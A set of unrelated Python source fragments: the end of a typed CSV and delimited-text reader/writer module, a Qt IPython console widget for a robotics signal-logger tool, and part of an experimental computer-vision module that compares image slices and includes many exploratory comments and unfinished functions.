the number of columns. Missing values are set to None to
produce a row of full length.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, input will commence when the
first data tuple is requested. Otherwise, the column headings
will be read immediately. If the headings are checked and fail
verification, an exception will be raised immediately.
Otherwise, input will continue when the first data tuple is
requested.
Usage:
reader = NamedInput(rowreader, shortrowsallowed, headingpolicy)
for namedtuple in reader:
do_something(namedtuple)
namedtuple = next(reader)
do_something(namedtuple)
The number of input lines read (including any headings) will be
available at any time during the life of the reader:
input_lines = reader.line_num
The column headings will be available at any time during the
life of the reader:
input_headings = reader.headingrow
When headingpolicy is NO_HEADING, the headings will be None.
Otherwise, the column headings will be as read from the input,
whether or not those headings match the headings defined for
each column.
"""
return self.__class__._NamedInput(self, rowreader, shortrowsallowed,
headingpolicy)
class _NamedInput(object):
def __init__(self, column, rowreader, shortrowsallowed, headingpolicy):
# self._names = column.names
self._inputlocation = column._inputlocation
self._listinput = column.ListInput(rowreader, shortrowsallowed,
headingpolicy)
self.NamedRow = column.NamedRow
# ListInput will discard headings, so we get line count from
# ListInput instance instead of counting lines in this instance.
self._line_num = self._listinput.line_num
@property
def line_num(self):
"""
This is the number of lines that have been read.
"""
return self._line_num
@property
def headingrow(self):
'''
Return headings as read from input.
Returns None if no headings (whenfirst row is data or input is
empty).
The headings may not be the same as the headings in the column
definition.
'''
return self._listinput.headingrow
def __iter__(self):
return self
def __next__(self):
"""
Return a line as an ordered dictionary of typed values.
"""
row = next(self._listinput) # get row and check length
data = self.NamedRow._make(row)
self._line_num = self._listinput.line_num
return data
def NamedOutput(self, rowwriter, headingpolicy=None):
"""
Create writer instance to output namwd tuples of typed values.
Each namedtuple must have a named item for each column. The
name of each item must be the same as the column name of the
corresponding column. Upon output, each item will be converted
from the type used by the application to a string of text.
rowwriter is an object (like cvs.writer) with a writerow method
that accepts an iterator of strings.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, output will commence with the
first data tuple. Otherwise, the column headings will be
written immediately and output will continue with the first
data tuple.
Usage:
writer = NamedOutput(rowreader, headingpolicy)
for namedtuple in iterable:
writer.write(namedtuple)
writer.writerows(iterable_of_namedtuple)
"""
return self._NamedOutput(self, rowwriter, headingpolicy)
class _NamedOutput(object):
def __init__(self, column, rowwriter, headingpolicy):
self._names = column.names
self._outputlocation = column._outputlocation
self._listoutput = column.ListOutput(rowwriter, headingpolicy)
# ListOutput will write headings, so we get line count from
# ListOutput instance instead of counting lines in this instance.
self._line_num = self._listoutput._line_num
def writerow(self, namedtuple):
"""
Write the named items of the tuple to the corresponding
named columns, converting internal values to strings as
necessary.
"""
rowdictionary = namedtuple._asdict()
try:
self._listoutput.writerow(
rowdictionary[name] for name in self._names)
self._line_num = self._listoutput._line_num
except KeyError as e:
raise ValueError(''.join([
self._outputlocation(self._line_num),
" namedtuple is missing values for one or",
" more column names.",
"\nColumn names:\n",
repr(self._names),
"\ntuple names:\n",
repr(rowdictionary.keys())
]) ) from e
def writerows(self, namedtupleiterator):
"""
Write the named items of each tuple to the corresponding
named columns, converting internal values to strings as
necessary.
"""
for namedtuple in namedtupleiterator:
self.writerow(namedtuple)
class Delim(object):
"""
Factory to create readers and writers for non-CSV delimited data.
Delim.reader() behaves similarly to csv.reader():
Creates an iterator that extracts a list of substrings from each
string produced by the source object.
Requires a source object that is a iterable of single
strings, with or without line-ends
Has a line_num attribute to count the source strings.
Usage:
# reader can be any iterable that produces strings of text.
# Line ends are allowed, but only at the end of text, where
# they will be ignored.
reader = Delim(delimiter).reader(line-iterator)
for row in reader:
do_something(row)
row = next(reader)
do_something(row)
number_of_lines_read = reader.line_num
Delim.writer() behaves similarly to csv.writer):
Returns an object with a writerow() method that accepts an
iterable of strings
Requires a destination object with a write() method that
accepts one string per invocation.
Has a writerow() method that accepts a list or other iterable of
strings.
Usage:
# textwriter can be any object with a write() method
# that accepts type str.
writer = Delim(delimiter).writer(textwriter)
writer.writerow(iterable_of_str)
writer.writerows(iterable_of_iterable_of_str)
"""
def __init__(self, delimiter):
"""
Initialize a factory for delimited reader and writer objects.
delimiter is a string of one or more characters used as a column
or field separator. Zero-length string is no delimiter
(entire line is a single field). None is a special delimiter
(single space for output, any sequence of consecutive spaces
for input).
"""
# on input, behaviour is as with str.split(delimiter)
self.delimread = delimiter
# on output, behaviour is as with delimiter.join([str for str in list])
if delimiter:
self.delimwrite = delimiter
else:
# None implies unspecified, so default to one space
self.delimwrite = ' '
def reader(self, textreader):
"""
Create a reader that splits text lines and returns lists of str.
Text is split at each delimiter unless the delimiter is an empty
string (no delimiter).
textreader is an iterable that returns a single string at each
iteration.
"""
return self._reader(textreader, self.delimread)
class _reader(object):
"""
Reader similar to CSV reader, but for delimited text.
"""
def __init__(self, textreader, delim):
self._line_num = 0
self.textreader = textreader
self.delim = delim
def __iter__(self):
return self
def __next__(self):
"""
Get next line as list of string, and count lines.
"""
line = next(self.textreader)
row = line.rstrip("\n\r").split(self.delim)
self._line_num += 1
return row
@property
def line_num(self):
"""
Number of lines read before current line.
"""
return self._line_num
def writer(self, textwriter):
"""
Create a writer that accepts lists of str and writes each list
as a single string of fields (the list items) joined by a
specified separator string (the delimiter).
textwriter is an object with a write() method that accepts a
single string at each invocation.
"""
return self._writer(textwriter, self.delimwrite)
class _writer(object):
"""
Writer similar to CSV writer, but for delimited text.
"""
def __init__(self, textwriter, delim):
self.textwriter = textwriter
self.delim = delim
def writerow(self, row):
self.textwriter.write(self.delim.join(str(r) for r in row) + "\n")
def writerows(self, rows):
for row in rows:
self.writerow(row)
if __name__ == "__main__":
"""Run as a script when invoked from shell command line."""
raise NotImplementedError("'" + sys.argv[0]
+ "' does not currently run as a standalone script") |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 ANYbotics AG
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy
from PySide2 import QtWidgets
from qtconsole.inprocess import QtInProcessKernelManager
from qtconsole.rich_jupyter_widget import RichJupyterWidget
class ConsoleWidget(RichJupyterWidget):
def __init__(self, *args, **kwargs):
super(ConsoleWidget, self).__init__(*args, **kwargs)
self.kernel_client = None
self.kernel_manager = None
def start(self, silo, ui):
self.start_kernel_manager(silo, ui)
self.start_kernel_client()
self.exit_requested.connect(QtWidgets.QApplication.quit)
self.clear()
def start_kernel_manager(self, silo, ui):
kernel_manager = QtInProcessKernelManager()
kernel_manager.start_kernel(show_banner=False)
kernel_manager.kernel.gui = 'qt'
def EulerAngles(name, roll, pitch, yaw, *args, **kwargs):
from signal_logger.rotation_signals import EulerAnglesZyxSignal
return EulerAnglesZyxSignal.from_constant(
name, silo.times, roll, pitch, yaw, *args, **kwargs)
def clf():
import pylab
pylab.clf()
ui.tab.ui.canvas.canvas.draw()
def plot(signal, *args, **kwargs):
# TODO(scaron): currently plots to the right axis, give choice
signal.plot(*args, **kwargs)
ui.tab.ui.canvas.canvas.draw()
kernel_manager.kernel.shell.push({
'EulerAngles': EulerAngles,
'clf': clf,
'plot': plot,
'pi': numpy.pi,
'silo': silo,
'ui': ui,
})
self.kernel_manager = kernel_manager
def start_kernel_client(self):
kernel_client = self._kernel_manager.client()
kernel_client.start_channels()
self.kernel_client = kernel_client
def clear(self):
"""Clear the IPython console."""
self._control.clear()
def execute_command(self, command):
"""Execute a command in the frame of the console widget."""
self._execute(command, False)
def print_text(self, text):
"""Print some plain text to the IPython console."""
self._append_plain_text(text)
|
'''
comp_slice_ is a terminal fork of intra_blob.
It traces blob axis by cross-comparing vertically adjacent Ps: horizontal slices across an edge blob.
These high-G high-Ma blobs are vectorized into outlines of adjacent flat or low-G blobs.
Vectorization is clustering of Ps + derivatives into PPs: patterns of Ps that describe an edge.
Double edge lines: assumed match between edges of high-deviation intensity, no need for cross-comp?
secondary cross-comp of low-deviation blobs? P comb -> intra | inter comp eval?
radial comp extension for co-internal blobs:
!= sign comp x sum( adj_blob_) -> intra_comp value, isolation value, cross-sign merge if weak, else:
== sign comp x ind( adj_adj_blob_) -> same-sign merge | composition:
borrow = adj_G * rA: default sum div_comp S -> relative area and distance to adjj_blob_
internal sum comp if mA: in thin lines only? comp_norm_G or div_comp_G -> rG?
isolation = decay + contrast:
G - G * (rA * ave_rG: decay) - (rA * adj_G: contrast, = lend | borrow, no need to compare vG?)
if isolation: cross adjj_blob composition eval,
else: cross adjj_blob merge eval:
blob merger if internal match (~raG) - isolation, rdn external match:
blob compos if external match (~rA?) + isolation,
Also eval comp_slice over fork_?
rng+ should preserve resolution: rng+_dert_ is dert layers,
rng_sum-> rng+, der+: whole rng, rng_incr-> angle / past vs next g,
rdn Rng | rng_ eval at rng term, Rng -= lost coord bits mag, always > discr?
'''
from time import time
from collections import deque
from class_cluster import ClusterStructure, NoneType
from math import hypot
import numpy as np
import warnings # to detect overflow issue, in case of infinity loop
warnings.filterwarnings('error')
ave = 20
div_ave = 200
flip_ave = 1000
ave_dX = 10 # difference between median x coords of consecutive Ps
class Cdert_P(ClusterStructure):
Pi = object # P instance, accumulation: Cdert_P.Pi.I += 1, etc.
Pm = int
Pd = int
mx = int
dx = int
mL = int
dL = int
mDx = int
dDx = int
mDy = int
dDy = int
mDg = int
dDg = int
mMg = int
dMg = int
sstack = object
class CPP(ClusterStructure):
stack_ = list
sstack_ = list
sstacki = object
# between PPs:
upconnect_ = list
in_upconnect_cnt = int # tentative upconnect count before getting the confirmed upconnect
downconnect_cnt = int
fPPm = NoneType # PPm if 1, else PPd; not needed if packed in PP_?
fdiv = NoneType
class CSstack(ClusterStructure):
# an element of sstack in PP
upconnect_ = list
upconnect_cnt = int
downconnect_cnt = int
#+ other params of CStack?
Py_ = list
dert_Pi = object
fdiv = NoneType
## PP
PP = object
PP_id = int
# sstack params = accumulated dert_P params:
# sPM, sPD, sMX, sDX, sML, sDL, sMDx, sDDx, sMDy, sDDy, sMDg, sDDg, sMMg, sDMg
# add to blob:
# PPm_ = list
# PPd_ = list # these are now primary blob-level structures
# derP__ = [np.flipud(dert_) for dert_ in dert__] # flip dert__ upside down
def comp_slice_(stack_, _P):
'''
cross-compare connected Ps of stack_, including Ps of adjacent stacks (upconnects)
'''
for stack in reversed(stack_): # bottom-up
if not stack.f_checked : # else this stack has been scanned as some other upconnect
stack.f_checked = 1
DdX = 0 # accumulate across stacks?
dert_Py_ = []
if not _P: # stack is from blob.stack_
_P = stack.Py_.pop()
dert_Py_.append(Cdert_P(Pi=_P)) # _P only, no derivatives in 1st dert_P
for P in reversed(stack.Py_):
dert_P = comp_slice(P, _P, DdX) # ortho and other conditional operations are evaluated per PP
dert_Py_.append(dert_P) # dert_P is converted to Cdert_P in comp_slice
_P = P
stack.Py_ = dert_Py_
if stack.upconnect_:
comp_slice_(stack.upconnect_, _P) # recursive compare _P to all upconnected Ps
def comp_slice_converting(stack_, _derP, _P):
'''
cross-compare connected Ps of stack_, including Ps of adjacent stacks (upconnects)
'''
derP_ = []
DdX = 0
for stack in reversed(stack_): # bottom-up
if not stack.f_checked : # else this stack has been scanned as some other upconnect
stack.f_checked = 1
downconnect_ = stack.downconnect_cnt
if not _P: # stack is from blob.stack_
_P = stack.Py_.pop()
_derP = CderP(Pi=_P, downconnect_ = downconnect_, stack = stack)
derP_.append(_derP) # no derivatives in 1st derP, assign stack.downconnect_cnt to derP.downconnect_
for P in reversed(stack.Py_):
derP = comp_slice(P, _P, DdX) # ortho and other conditional operations are evaluated per PP
for downconnect in P.downconnect_: # assign current derP as downconnect' upconnect:
if downconnect is not _derP:
downconnect.upconnect_.append(derP)
_derP.upconnect_.append(derP) # next
derP.downconnect_ = downconnect_
derP_.append(derP) # derP is converted to CderP in comp_slice
_P = P
_derP = derP
downconnect_ = [_derP] # always 1 inside Py_
for upconnect in stack.upconnect_: # store _derP in upconnect to assign upconnected derPs to _derP later
upconnect.Py_[-1].downconnect_.append(_derP) # last P of upconnect is connected to 1st derP of current stack
if stack.upconnect_:
derP_ += comp_slice_(stack.upconnect_, _derP, _P) # recursive compare _P to all upconnected Ps
return derP_
def comp_slice(P, _P, DdX): # forms vertical derivatives of P params, and conditional ders from norm and DIV comp
s, x0, G, M, Dx, Dy, L, Dg, Mg = P.sign, P.x0, P.G, P.M, P.Dx, P.Dy, P.L, P.Dg, P.Mg
# params per comp branch, add angle params, ext: X, new: L,
# no input I comp in top dert?
_s, _x0, _G, _M, _Dx, _Dy, _L, _Dg, _Mg = _P.sign, _P.x0, _P.G, _P.M, _P.Dx, _P.Dy, _P.L, _P.Dg, _P.Mg
'''
redefine Ps by dx in dert_, rescan dert by input P d_ave_x: skip if not in blob?
'''
xn = x0 + L-1; _xn = _x0 + _L-1
mX = min(xn, _xn) - max(x0, _x0) # position match = overlap: abs proximity?
_dX = (xn - L/2) - (_xn - _L/2) # average position miss?
dX = abs(x0 - _x0) + abs(xn - _xn) # offset, or max_L - overlap: abs distance?
if dX > ave_dX: # internal comp is higher-power, else two-input comp not compressive?
rX = dX / (mX+.001) # average dist/prox, | prox/dist, | mX / max_L?
ave_dx = (x0 + (L-1)//2) - (_x0 + (_L-1)//2) # d_ave_x, median vs. summed, or for distant-P comp only?
DdX += dX - _dX # long axis curvature; if > ave: ortho eval per P, else per PP_dX?
# param correlations: dX-> L, ddX-> dL, neutral to Dx: mixed with anti-correlated oDy?
'''
if ortho: # estimate params of P locally orthogonal to long axis, maximizing lateral diff and vertical match
Long axis is a curve, consisting of connections between mid-points of consecutive Ps.
Ortho virtually rotates each P to make it orthogonal to its connection:
hyp = hypot(dX, 1) # long axis increment (vertical distance), to adjust params of orthogonal slice:
L /= hyp
# re-orient derivatives by combining them in proportion to their decomposition on new axes:
Dx = (Dx * hyp + Dy / hyp) / 2 # no / hyp: kernel doesn't matter on P level?
Dy = (Dy / hyp - Dx * hyp) / 2 # estimated D over vert_L
'''
dL = L - _L; mL = min(L, _L) # L: positions / sign, dderived: magnitude-proportional value
dM = M - _M; mM = min(M, _M) # no Mx, My: non-core, lesser and redundant bias?
dDx = abs(Dx) - abs(_Dx); mDx = min(abs(Dx), abs(_Dx)) # same-sign Dx in vxP
dDy = Dy - _Dy; mDy = min(Dy, _Dy) # Dy per sub_P by intra_comp(dx), vs. less vertically specific dI
# gdert param comparison, if not fPP, values would be 0
dMg = Mg - _Mg; mMg = min(Mg, _Mg)
dDg = Dg - _Dg; mDg = min(Dg, _Dg)
Pd = ddX + dL + dM + dDx + dDy + dMg + dDg # -> directional dPP, equal-weight params, no rdn?
# correlation: dX -> L, oDy, !oDx, ddX -> dL, odDy ! odDx? dL -> dDx, dDy? G = hypot(Dy, Dx) for 2D structures comp?
Pm = mX + mL + mM + mDx + mDy + mMg + mDg # -> complementary vPP, rdn *= Pd | Pm rolp?
dert_P = Cdert_P(Pi=P, Pm=Pm, Pd=Pd, mX=mX, dX=dX, mL=mL, dL=dL, mDx=mDx, dDx=dDx, mDy=mDy, dDy=dDy, mDg=mDg, dDg=dDg, mMg=mMg, dMg=dMg)
# div_f, nvars
return dert_P
def comp_slice_old(blob, AveB): # comp_slice eval per blob, simple stack_
for stack in blob.stack_:
if stack.G * stack.Ma - AveB / 10 > 0: # / 10: ratio AveB to AveS, or not needed?
# or default (L, Dy, Dx, G) min comp for rotation,
# primary comp L, the rest is normalized?
# overlap vs. shift:
# init cross-dimension div_comp: Dx/Dy, but separate val for comp G, no default G/L?
# comp -> min Dx/Dy for rotation, min G for comp_g?
# also default min comp to upconnect_ Ps -> forking / merging PPs -> stack_ per PP!
# stack.f_stackPP = 1 # scan Py_ -> comp_slice -> form_PP -> 2D PP_: clusters of same-sign dP | mP
DdX = 0
if stack.G * (stack.Ly / stack.A) * (abs(stack.Dy) / abs((stack.Dx) + 1)) > ave: # G_bias * L_bias -> virt.rotation:
# or default min comp, eval per PP?
ortho = 1 # estimate params of P orthogonal to long axis at P' y and ave_x, to increase mP
else:
ortho = 0
dert_P_ = []
_P = stack.Py_[0]
for P in stack.Py_[1:]:
dert_P = comp_slice(ortho, P, _P, DdX)
dert_P_.append(dert_P)
_P = P
def stack_2_PP_(stack_, PP_):
'''
first stack_ call, then sign-unconfirmed upconnect_ calls
'''
for i, stack in enumerate(stack_): # bottom-up to follow upconnects
if stack.downconnect_cnt == 0: # root stacks were not checked, upconnects always checked
_dert_P = stack.Py_[0]
sstack = CSstack(dert_Pi=_dert_P, Py_=[_dert_P]) # sstack: secondary stack, dert_P sigh-confirmed
_dert_P.sstack = sstack
PP = CPP(sstacki=sstack,sstack_=[sstack])
sstack.PP = PP # initialize upward reference
for dert_P in stack.Py_[1:]:
if (_dert_P.Pm > 0) != (dert_P.Pm > 0):
stack.sstack_.append(sstack)
stack.PP = PP
PP_.append(PP) # terminate sstack and PP
sstack = CSstack(dert_Pi=Cdert_P()) # init sstack
PP = CPP(sstacki=sstack,sstack_=[sstack]) # init PP with the initialized sstack
sstack.PP = PP
accum_sstack(sstack, dert_P) # regardless of termination
_dert_P = dert_P
upconnect_2_PP_(stack.upconnect_, PP_, PP) # form PPs across upconnects
return PP_
def upconnect_2_PP_(stack_, PP_, iPP): # terminate, initialize, increment blob PPs: clusters of same-sign mP dert_Ps
if iPP.in_upconnect_cnt > 0: # to track connects across function calls
iPP.in_upconnect_cnt -= 1 # decreased by current upconnect
upconnect_ = []
isstack = iPP.sstack_[-1]
_dert_P = isstack.Py_[-1]
for i, stack in enumerate(stack_): # breadth-first, upconnect_ is not reversed
dert_P = stack.Py_[0]
if (_dert_P.Pm > 0) == (dert_P.Pm > 0): # upconnect has same sign
upconnect_.append(stack_.pop(i)) # separate stack_ into sign-connected stacks: upconnect_, and unconnected stacks: popped stack_
# iPP may still having non-terminated upconnects in other loops, we need add them instead of reassigning
iPP.in_upconnect_cnt += len(upconnect_)
if len(upconnect_) == 1: # 1 same-sign upconnect per PP
if not upconnect_[0].sstack_: # sstack_ is empty until stack is scanned over
accum_sstack(isstack, _dert_P) # accumulate the input _dert_P
PP = iPP # no difference in single stack
for dert_P in upconnect_[0].Py_:
if (_dert_P.Pm > 0) != (dert_P.Pm > 0):
upconnect_[0].sstack_.append(isstack)
upconnect_[0].PP = PP
PP.in_upconnect_cnt -= 1
if PP.in_upconnect_cnt == 0:
PP_.append(PP) # terminate sstack and PP
isstack = CSstack(dert_Pi=Cdert_P()) # init empty sstack, then accum_sstack
PP = CPP(sstacki=isstack, sstack_=[isstack])
isstack.PP = PP
# else isstack is not terminated, no need to update connects
accum_sstack(isstack, dert_P) # regardless of termination
_dert_P = dert_P
upconnect_2_PP_(upconnect_[0].upconnect_, PP_, PP)
else:
merge_PP(iPP, upconnect_[0].sstack_[0].PP, PP_) # merge connected PPs
iPP.in_upconnect_cnt -= 1
if iPP.in_upconnect_cnt <= 0:
PP_.append(iPP)
elif upconnect_: # >1 same-sign upconnects per PP
idert_P = _dert_P # downconnected dert_P
confirmed_upconnect_ = [] # same dert_P sign
for upconnect in upconnect_: # form PPs across stacks
sstack = isstack # downconnected sstack
PP = iPP # then redefined per stack
_dert_P = idert_P
ffirst = 1 # first dert_P in Py_
if not upconnect.sstack_:
for dert_P in upconnect.Py_:
if (_dert_P.Pm > 0) != (dert_P.Pm > 0):
# accum_PP(upconnect, sstack, PP) # term. sstack
upconnect.sstack_.append(sstack)
upconnect.PP = PP
# separate iPP termination test
if PP is iPP:
PP.in_upconnect_cnt -= 1
if PP.in_upconnect_cnt == 0:
PP_.append(PP)
else: # terminate stack-local PP
PP_.append(PP)
sstack = CSstack(dert_Pi=Cdert_P()) # init empty PP, regardless of iPP termination
PP = CPP(sstacki=sstack,sstack_=[sstack]) # we don't know if PP will fork at stack term
sstack.PP = PP
accum_sstack(sstack, dert_P) # regardless of termination
if (PP is iPP) and ffirst and ((_dert_P.Pm > 0) == (dert_P.Pm > 0)):
confirmed_upconnect_.append(dert_P) # to access dert_P.sstack
_dert_P = dert_P
ffirst = 0
upconnect_2_PP_(upconnect.upconnect_, PP_, PP)
else:
merge_PP(iPP, upconnect.sstack_[0].PP, PP_)
iPP.in_upconnect_cnt -= 1
if iPP.in_upconnect_cnt <= 0:
PP_.append(iPP)
# after all upconnects are checked:
if confirmed_upconnect_: # at least one first (_dert_P.Pm > 0) == (dert_P.Pm > 0) in upconnect_
if len(confirmed_upconnect_) == 1: # sstacks merge:
dert_P = confirmed_upconnect_[0]
merge_sstack(iPP.sstack_[-1], dert_P.sstack)
else:
for dert_P in confirmed_upconnect_:
# iPP is accumulated and isstack is downconnect of new sstack
iPP.sstack_[-1].upconnect_.append(dert_P.sstack)
dert_P.sstack.downconnect_cnt += 1
else:
if iPP.in_upconnect_cnt:
iPP.in_upconnect_cnt -= 1
if iPP.in_upconnect_cnt <= 0: # 0 same-sign upconnects per PP:
PP_.append(iPP)
stack_2_PP_(stack_, PP_) # stack_ now contains only stacks unconnected to isstack
def merge_PP(_PP, PP, PP_): # merge PP into _PP
_PP.sstack_.extend(PP.sstack_)
_PP.sstacki.dert_Pi.accumulate(Pm=PP.sstacki.dert_Pi.Pm, Pd=PP.sstacki.dert_Pi.Pd, mx=PP.sstacki.dert_Pi.mx, dx=PP.sstacki.dert_Pi.dx,
mL=PP.sstacki.dert_Pi.mL, dL=PP.sstacki.dert_Pi.dL, mDx=PP.sstacki.dert_Pi.mDx, dDx=PP.sstacki.dert_Pi.dDx,
mDy=PP.sstacki.dert_Pi.mDy, dDy=PP.sstacki.dert_Pi.dDy, mDg=PP.sstacki.dert_Pi.mDg,
dDg=PP.sstacki.dert_Pi.dDg, mMg=PP.sstacki.dert_Pi.mMg, dMg=PP.sstacki.dert_Pi.dMg)
for sstack in PP.sstack_: # update PP reference
sstack.PP = _PP
if PP in PP_:
PP_.remove(PP) # remove the merged PP
def accum_sstack(sstack, dert_P): # accumulate dert_P into sstack
# accumulate dert_P params into sstack
sstack.dert_Pi.accumulate(Pm=dert_P.Pm, Pd=dert_P.Pd, mx=dert_P.mx, dx=dert_P.dx,
mL=dert_P.mL, dL=dert_P.dL, mDx=dert_P.mDx, dDx=dert_P.dDx,
mDy=dert_P.mDy, dDy=dert_P.dDy, mDg=dert_P.mDg, dDg=dert_P.dDg,
mMg=dert_P.mMg, dMg=dert_P.dMg)
sstack.Py_.append(dert_P)
dert_P.sstack = sstack # update sstack reference in dert_P
def accum_PP(stack, sstack, PP): # accumulate PP
# accumulate sstack params into PP
PP.sstacki.dert_Pi.accumulate(Pm=sstack.dert_Pi.Pm, Pd=sstack.dert_Pi.Pd, mx=sstack.dert_Pi.mx, dx=sstack.dert_Pi.dx,
mL=sstack.dert_Pi.mL, dL=sstack.dert_Pi.dL, mDx=sstack.dert_Pi.mDx, dDx=sstack.dert_Pi.dDx,
mDy=sstack.dert_Pi.mDy, dDy=sstack.dert_Pi.dDy, mDg=sstack.dert_Pi.mDg, dDg=sstack.dert_Pi.dDg,
mMg=sstack.dert_Pi.mMg, dMg=sstack.dert_Pi.dMg)
PP.sstack_.append(sstack)
sstack.PP = PP
sstack.PP_id = PP.id
# add sstack to stack
if stack:
stack.sstack_.append(sstack)
stack.PP = PP
def accum_gstack(gsstack, istack, sstack): # accumulate istack and sstack into stack
'''
This looks wrong, accum_nested_stack should be an add-on to accum_sstack
only called if istack.f_sstack:
accum_sstack accumulates dert_P into sstack
# accum_gstack accumulates sstack into gsstack?
'''
if istack.f_sstack: # input stack is sstack
# sstack params
dert_Pi, mPP_, dPP_, dert_P_, fdiv = sstack.unpack()
# need to accumulate dert_P params here, from sstack.dert_P params
# accumulate sstack params
gsstack.sstack.mPP_.extend(mPP_)
gsstack.sstack.dPP_.extend(dPP_)
gsstack.sstack.dert_P_.extend(dert_P_)
gsstack.sstack.fdiv = fdiv
# istack params
I, Dy, Dx, G, M, Dyy, Dyx, Dxy, Dxx, Ga, Ma, A, Ly, x0, xn, y0, Py_, sign, _, _, _, _, _, _, _ = istack.unpack()
# accumulate istack param into stack_sstack
gsstack.I += I
gsstack.Dy += Dy
gsstack.Dx += Dx
gsstack.G += G
gsstack.M += M
gsstack.Dyy += Dyy
gsstack.Dyx += Dyx
gsstack.Dxy += Dxy
gsstack.Dxx += Dxx
gsstack.Ga += Ga
gsstack.Ma += Ma
gsstack.A += A
gsstack.Ly += Ly
if gsstack.x0 > x0: gsstack.x0 = x0
if gsstack.xn < xn: gsstack.xn = xn
if gsstack.y0 > y0: gsstack.y0 = y0
gsstack.Py_.extend(Py_)
gsstack.sign = sign # sign should be same across istack
'''
Pd and Pm are ds | ms per param summed in P. Primary comparison is by subtraction, div if par * rL compression:
DL * DS > min: must be both, eval per dPP PD, signed? comp d?
- resulting vertically adjacent dPPs and vPPs are evaluated for cross-comparison, to form PPPs and so on
- resulting param derivatives form par_Ps, which are evaluated for der+ and rng+ cross-comparison
| default top+ P level: if PD | PM: add par_Ps: sub_layer, rdn ele_Ps: deeper layer?
aS compute if positive eV (not qD?) = mx + mL -ave? :
aI = I / L; dI = aI - _aI; mI = min(aI, _aI)
aD = D / L; dD = aD - _aD; mD = min(aD, _aD)
aM = M / L; dM = aM - _aM; mM = min(aM, _aM)
d_aS comp if cs D_aS, iter dS - S -> (n, M, diff): var precision or modulo + remainder?
pP_ eval in +vPPs only, per rdn = alt_rdn * fork_rdn * norm_rdn, then cost of adjust for pP_rdn?
eval_div(PP):
if dL * Pm > div_ave: # dL = potential compression by ratio vs diff, or decremental to Pd and incremental to Pm?
rL = L / _L # DIV comp L, SUB comp (summed param * rL) -> scale-independent d, neg if cross-sign:
nDx = Dx * rL; ndDx = nDx - _Dx; nmDx = min(nDx, _Dx) # vs. nI = dI * rL or aI = I / L?
nDy = Dy * rL; ndDy = nDy - _Dy; nmDy = min(nDy, _Dy)
Pnm = mX + nmDx + nmDy # defines norm_mPP, no ndx: single, but nmx is summed
if Pm > Pnm: nmPP_rdn = 1; mPP_rdn = 0 # added to rdn, or diff alt, olp, div rdn?
else: mPP_rdn = 1; nmPP_rdn = 0
Pnd = ddX + ndDx + ndDy # normalized d defines norm_dPP or ndPP
if Pd > Pnd: ndPP_rdn = 1; dPP_rdn = 0 # value = D | nD
else: dPP_rdn = 1; ndPP_rdn = 0
div_f = 1
nvars = Pnm, nmDx, nmDy, mPP_rdn, nmPP_rdn, Pnd, ndDx, ndDy, dPP_rdn, ndPP_rdn
else:
div_f = 0 # DIV comp flag
nvars = 0 # DIV + norm derivatives
'''
def term_PP2(typ, PP): # eval for orient (as term_blob), incr_comp_slice, scan_par_:
s, L2, I2, D2, Dy2, M2, My2, G2, Olp2, Py_, PM, PD, Mx, Dx, ML, DL, MI, DI, MD, DD, MDy, DDy, MM, DM, MMy, DMy, nVars = PP
rdn = Olp2 / L2 # rdn per PP, alt Ps (if not alt PPs) are complete?
# if G2 * Dx > ave * 9 * rdn and len(Py_) > 2:
# PP, norm = orient(PP) # PP norm, rescan relative to parent blob, for incr_comp, comp_sliceP, and:
if G2 + PM > ave * 99 * rdn and len(Py_) > 2:
PP = incr_range_comp_slice(typ, PP) # forming incrementally fuzzy PP
if G2 + PD > ave * 99 * rdn and len(Py_) > 2:
PP = incr_deriv_comp_slice(typ, PP) # forming incrementally higher-derivation PP
if G2 + PM > ave * 99 * rdn and len(Py_) > 2: # PM includes results of incr_comp_slice
PP = scan_params(0, PP) # forming vpP_ and S_p_ders
if G2 + PD > ave * 99 * rdn and len(Py_) > 2: # PD includes results of incr_comp_slice
PP = scan_params(1, PP) # forming dpP_ and S_p_ders
return PP
''' incr_comp() ~ recursive_comp() in line_POC(), with Ps instead of pixels?
with rescan: recursion per p | d (signed): frame(meta_blob | blob | PP)? '''
def incr_range_comp_slice(typ, PP):
return PP
def incr_deriv_comp_slice(typ, PP):
return PP
def scan_params(typ, PP): # at term_network, term_blob, or term_PP: + P_ders and nvars?
'''
Aves (integer filters) and coefs (ratio filters) per parameter type trigger formation of parameter_Ps,
after full-blob comp_slice_ sums match and miss per parameter.
Also coefs per sub_blob from comp_blob_: potential parts of a higher object?
'''
P_ = PP[11]
Pars = [ (0,0,0,[]) ]
for P in P_: # repack ders into par_s by parameter type:
